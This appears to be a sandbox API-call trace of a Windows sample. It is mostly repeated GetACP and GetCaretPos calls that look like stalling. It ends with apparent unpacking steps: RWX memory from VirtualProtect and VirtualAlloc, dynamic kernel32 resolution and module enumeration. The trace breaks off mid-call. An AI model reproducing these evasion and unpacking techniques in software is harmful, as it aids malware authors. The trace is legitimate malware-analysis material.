[0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.007] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.007] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.008] GetACP () returned 0x4e4 [0069.008] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.009] GetACP () returned 0x4e4 [0069.009] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.010] GetACP () returned 0x4e4 [0069.010] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.011] GetACP () returned 0x4e4 [0069.011] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.012] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.012] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.013] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.013] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.014] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.014] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.015] GetACP () returned 0x4e4 [0069.015] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.016] GetACP () returned 0x4e4 [0069.016] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.016] GetACP () returned 0x4e4 [0069.016] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.016] GetACP () returned 0x4e4 [0069.016] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.016] GetACP () returned 0x4e4 [0069.016] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.016] GetACP () returned 0x4e4 [0069.016] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.016] GetACP () returned 0x4e4 [0069.016] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.016] GetACP () returned 0x4e4 [0069.016] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.016] GetACP () returned 0x4e4 [0069.016] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.017] GetACP () returned 0x4e4 [0069.017] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.017] GetACP () returned 0x4e4 [0069.017] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.017] GetACP () returned 0x4e4 [0069.017] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.017] GetACP () returned 0x4e4 [0069.017] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.017] GetACP () returned 0x4e4 [0069.017] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.017] GetACP () returned 0x4e4 [0069.017] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.017] GetACP () returned 0x4e4 [0069.017] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.017] GetACP () returned 0x4e4 [0069.017] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.017] GetACP () returned 0x4e4 [0069.017] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.017] GetACP () returned 0x4e4 [0069.017] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.018] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.018] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.018] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.018] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.018] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.018] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.018] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.018] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.018] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.018] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.018] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.018] GetACP () returned 0x4e4 [0069.019] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.019] GetACP () returned 0x4e4 [0069.019] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.019] GetACP () returned 0x4e4 [0069.019] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.019] GetACP () returned 0x4e4 [0069.019] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.019] GetACP () returned 0x4e4 [0069.019] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.019] GetACP () returned 0x4e4 [0069.019] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.019] GetACP () returned 0x4e4 [0069.019] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.019] GetACP () returned 0x4e4 [0069.019] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.019] GetACP () returned 0x4e4 [0069.019] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.019] GetACP () returned 0x4e4 [0069.019] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.019] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.020] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.020] GetACP () returned 0x4e4 [0069.021] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.021] GetACP () returned 0x4e4 [0069.021] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.021] GetACP () returned 0x4e4 [0069.021] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.021] GetACP () returned 0x4e4 [0069.021] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.021] GetACP () returned 0x4e4 [0069.021] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.021] GetACP () returned 0x4e4 [0069.021] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.021] GetACP () returned 0x4e4 [0069.021] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.021] GetACP () returned 0x4e4 [0069.021] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.021] GetACP () returned 0x4e4 [0069.021] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.021] GetACP () returned 0x4e4 [0069.021] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.021] GetACP () returned 0x4e4 [0069.021] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.021] GetACP () returned 0x4e4 [0069.022] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.022] GetACP () returned 0x4e4 [0069.022] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.022] GetACP () returned 0x4e4 [0069.022] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.022] GetACP () returned 0x4e4 [0069.022] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.022] GetACP () returned 0x4e4 [0069.022] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.022] GetACP () returned 0x4e4 [0069.022] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0069.022] GetACP () returned 0x4e4 [0069.426] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76e10000 [0069.426] VirtualProtect (in: lpAddress=0x220020, dwSize=0x90bd7, flNewProtect=0x40, lpflOldProtect=0x18f714 | out: lpflOldProtect=0x18f714*=0x4) returned 1 [0069.488] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0069.488] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalAlloc") returned 0x76e2588e [0069.488] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0069.489] GetProcAddress (hModule=0x76e10000, lpProcName="Sleep") returned 0x76e210ff [0069.489] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0069.489] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0069.489] GetProcAddress (hModule=0x76e10000, lpProcName="Module32First") returned 0x76ea5cd9 [0069.489] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0069.489] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58 [0069.491] Module32First (hSnapshot=0x58, lpme=0x18f4dc) returned 1 [0069.494] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x540000 [0069.557] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0069.557] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e10000 [0069.557] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0069.557] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualProtect") returned 0x76e2435f [0069.557] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualFree") returned 0x76e2186e [0069.557] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0069.558] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0069.558] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0069.558] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0069.558] SetErrorMode (uMode=0x400) returned 0x0 [0069.558] SetErrorMode (uMode=0x0) returned 0x400 [0069.558] GetVersionExA (in: lpVersionInformation=0x18e40c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, 